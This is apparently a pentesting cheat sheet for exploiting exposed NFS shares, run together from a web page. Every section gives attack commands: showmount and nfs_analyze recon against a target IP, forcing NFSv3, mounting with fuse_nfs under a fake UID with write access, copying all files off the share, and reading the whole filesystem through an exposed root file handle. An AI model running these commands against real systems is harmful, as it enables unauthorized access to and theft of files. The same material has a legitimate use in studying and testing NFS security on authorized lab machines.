Recon#
Show shares that is opened to everyone
showmount -e 10.10.11.78Show all mounts
showmount -a 10.10.11.78Analyze the share.
- If support
nfs3andsysauth method, then we can mount and read files #Force nfs3 #Sys Auth - If root file handler exposed, we can read every file on the system #Root file handler exposed
nfs_analyze 10.10.11.78Mount#
Mount on local machine
sudo mount -t nfs 10.10.11.78:<EXPORT_PATH> ./nfs/ -o nolockForce nfs3#
Force nfs3 and mount (to fake uid to read files, require sys auth method)
sudo mount -t nfs -o vers=3 10.10.11.78:<EXPORT_PATH> ./nfs/ -o nolockSys Auth#
Mount with a fake uid
sudo fuse_nfs /mnt 10.10.11.78 --fake-uid --allow-write --export <EXPORT_PATH>Copy all files
sudo cp -r /mnt/ ./
sudo chown -R kali:kali ./mntRoot file handler exposed#
Mount with a fake uid and manual file handler
sudo fuse_nfs /mnt 10.10.11.78 --fake-uid --allow-write --manual-fs <FILE_HANDLE>